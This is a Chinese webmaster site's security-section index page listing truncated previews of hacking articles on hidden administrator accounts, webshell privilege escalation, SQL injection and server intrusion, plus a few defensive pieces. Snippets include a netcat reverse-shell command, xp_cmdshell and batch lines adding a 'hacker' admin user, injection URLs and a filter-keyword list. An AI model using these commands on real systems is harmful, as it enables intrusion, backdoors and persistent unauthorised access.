登录 | 立即注册
开启辅助访问
软件源码编程教程

17站长网

17站长网 首页 安全
  • 克隆账户隐藏超级用户创建全接触
  • 克隆账户隐藏超级用户创建全接触
  •  一、利用帐户克隆工具来创建  Clone Administrator(CA.exe),利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在)。克隆得到的帐号具有和系统内置的Administrator同样
  •   时间: 2022-9-26 13:03
  • windows下建立永久帐号方法
  • 操作步骤: 1、在自己电脑里面建立一个.txt文本文件. 2、在里面输入内容: @echo off net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码; net localgroup administrators xixi /add 3、把这个文件
  •   时间: 2022-9-26 13:03
  • 服务器建立超级隐藏账号方法
  • 在肉鸡上建立一个隐藏的账户,以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密。    &n
  •   时间: 2022-9-26 13:03
  • 3389无法连接的5种原因分析
  • 1、服务器在内网。 2、做了tcp/ip筛选。 先执行下面cmd命令:cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,导出注册表里关于TCP/IP筛选的第一处cmd /c regedit -e c:\2.r
  •   时间: 2022-9-26 13:02
  • SC.exe在渗透中的妙用
  • 1、利用Sc getkeyname来获取服务的名字 首先我们可以利用 net start 来得到系统中的服务显示名称 然后我们利用 sc getkeyname 来得到服务的真实名称 这样我们就得到了服务的真实名称,然后我们利用 net stop 服务名
  •   时间: 2022-9-26 13:02
  • webshell下执行CMD的小技巧分享
  • webshell下执行CMD的小技巧分享
  • 在webshell下执行CMD,按照常规: path:c:\windows\temp\cmd.exe 查用户: Command: /c net user 这个情况是system32目录的net.exe 你能调用到。 要是调用不到,只能传文件到执行目录。 假设更cmd在同一个目录
  •   时间: 2022-9-26 13:02
  • webshell下提权两个小技巧分享
  • webshell下提权两个小技巧分享
  • webshell提权小技巧 cmd路径: c:\windows\temp\cmd.exe nc也在同目录下 例如反弹cmdshell: "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe" 通常都不会成功。 而直接在 cmd路径上 输入 c:\windows
  •   时间: 2022-9-26 13:01
  • 通过MySQL系统得到cmdshell的方法与防范
  • 1、连接到对方MYSQL 服务器    mysql -u root -h 192.168.0.1    mysql.exe 这个程序在你安装了MYSQL的的BIN目录中 2、让我们来看看服务器中有些什么数据库    mysql>show databases;    MYSQL默认安装时
  •   时间: 2022-9-26 13:00
  • 手动mysql 高级注入实例分析
  • 利用Information_schema系统库来注入,配合使用group_concat()函数,group_concat()功能强大,而且能够绕过limit限制 http://127.0.0.1/sql.php?id=1 union select 0,0,0 字段为 3 http://127.0.0.1/sql.php?id=1 and 1
  •   时间: 2022-9-26 13:00
  • SQL注入攻击的种类和防范手段
  • SQL注入攻击的种类 知彼知己,方可取胜。首先要清楚SQL注入攻击有哪些种类。 1.没有正确过滤转义字符 在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给一个SQL语句。这样就会导致应用
  •   时间: 2022-9-26 12:56
  • Mysql另类盲注中的一些技巧小结
  • Mysql另类盲注中的一些技巧小结
  • 一、order by 的参数注入技巧:两种方法,思路都一样。 example. “select username,password from uc_members order by”.$_GET['oderby'] a.常见的利用方法:1.[SQL] select username,password from uc_members
  •   时间: 2022-9-26 12:54
  • SQL注入中获取数据的一些技巧分析
  • 一、MSSQL获取数据: 用的比较多的就是for xml raw了,MSSQL2000都支持的! 注入中显示数据的两个办法均可以使用,一是union select、二是显错,以MSSQL2005为例: 代码如下:select username from members where 1=2
  •   时间: 2022-9-26 12:54
  • 渗透服务器技巧:绕过防注入文件
  • 一般通用过滤字符串的关键字有以下这些: and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未
  •   时间: 2022-9-26 12:53
  • 通过MSSQL 2000入侵服务器主机器的命令
  • 首先确保得到数据库超级管理员权限 然后执行如下SQL命令: 1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add' 2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add' 解释: 1.
  •   时间: 2022-9-26 12:52
  • 知道对方IP后如何入侵别人的电脑
  • 黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方
  •   时间: 2022-9-26 12:51
  • 实例讲解木马的分析方法
  • 以前有过一款国产木马,它有个好听的名字,叫做“广外女生”。这个木马是广东外语外贸大学“广外女生”网络小组的作品,它可以运行于WIN98,WIN98SE,WINME,WINNT,WIN2000或已经安装Winsock2.0的Win95/97上。与以
  •   时间: 2022-9-26 12:50
  • 记一次曲折的php入侵
  • 闲着无聊就又找了个站来玩玩。随便找了个。点看链接一看php的。。php的就php的吧。反正练习 于是就判断是否存在注入点。 and 1=1 and 1=2 返回不同。判断数据库是否大于4。0.。大于呵呵。可。。正当高行的时候
  •   时间: 2022-9-26 12:50
  • MS07-029漏洞利用入侵过程
  • MS07-029漏洞利用入侵过程
  • 前言: MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。 今天
  •   时间: 2022-9-26 12:50
  • PHP注入入侵实例
  • 今天我要给大家讲解的是一个非常NB的入侵过程,我自己觉得非常的精彩,里面包含了非常多的知识点,这对与完全不懂php的朋友一样能够读懂,并且按照里面的技术自己来进行入侵类似的网站,并且能够得到非常好的效果。
  •   时间: 2022-9-26 12:48
  • 另类巧妙的思路:旁门左道的入侵方式详解!
  • 很多的时候,入侵并不是单纯靠技术的,有很多是运气因素,更重要的是如何对一些摆在你面前的一些安全破绽的攻击。我很相信安全意识这个东西,当一台服务器摆在你面前时,大概的看下就知道服务器的安全到底如何了,特
  •   时间: 2022-9-26 12:48
  • 黑客是怎样突破和绕过检测系统的
  • 攻击目标:www.***.com 测试过的动作,一句话马,加密马,等。 测试结果:无效,无法上传,无法进入系统。 经过2天的分析, 然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
  •   时间: 2022-9-26 12:47
  • IDS入侵特征库样本数据建立详解
  • IDS要有效地捕捉入侵行为,必须拥有一个强大的入侵特征数据库,这就如同一款强大的杀毒软件必须拥有强大且完善的病毒库一样。但是,IDS一般所带的特征数据库都比较滞后于新的攻击手段,入侵行为稍微改变往往便会相逢
  •   时间: 2022-9-26 12:46
  • 利用SA权限入侵Mssql主机后的感悟
  • 想必大家都知道MSSQL中SA权限是什么,可以说是至高无上。今天我就它的危害再谈点儿,我所讲的是配合NBSI上传功能得到WebShell。在讲之前先说几个条件,否则得到Shell是有难度的。   想必大家都知道MSSQL中S
  •   时间: 2022-9-26 12:36
  • sniffer攻击实例
  • 假设我们已经通过某种方法成功的攻人了 Solaris 主机 202.11.22.33(本文隐藏了实际 IP地址,下同)并且获得这台主机上的最高root权限。那么,现在我们就可以在这台主机上使用Sniffer来嗅探此网段上传输的密码。
  •   时间: 2022-9-26 11:00
  • 看看黑客是怎样使用Google黑掉Windows服务器
  • 在我的《为什么使用Google扫描安全漏洞》的技巧中,我讨论了如何使用Google.com来执行对你的面向公众的服务器的安全扫描――包括Windows、IIS、Apache和(但愿不会如此!)SQL Server。你能使用它得到服务器的信息、
  •   时间: 2022-9-26 10:59
  • 利用windows脚本入侵WINDOWS服务器
  • 随着网络的快速发展,很多服务器都采用WINDOWS架构,WINDOWS系列以操作简单而著称,但同时漏洞也很多,号称BUG之王,现在有很多入侵WINDOWS服务器的黑客软件,今天我介绍一款另类的入侵windows服务器软件--rcmd.VBS
  •   时间: 2022-9-26 10:57
  • 模拟入侵者检测网络攻击
  • 随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民服务,银行和证券机构也都开始依托互联网来进行金融和股票交
  •   时间: 2022-9-26 10:56
12345678910... 14下一页

相关分类

安全设置 安全教程 入侵防御 脚本攻防 病毒查杀 漏洞分析 业界动态 安全其它

热门排行

    最近更新

      关于17站长网
      致力于有效地持续为站长提供全面的站长信息,帮助站长转型升级,为互联网创业者提供更加优质的创业信息和品牌营销服务,与站长一起进步!
      全力以赴为站长服务的站长网!!
      关于我们联系我们寻求报道
      商务合作投稿须知版权声明
      开通VIP
      联系我们
      官方客服QQ:492214323
      举报投诉邮箱:492214323@qq.com
      © 2015-2020 合肥一七推网络科技有限公司 版权所有 皖ICP备14001855号-15  本站内容来自互联网和网友会员发布,观点仅代表作者本人。如发现有涉嫌侵权/违法的内容,请发送邮件举报。|网站地图
      返回顶部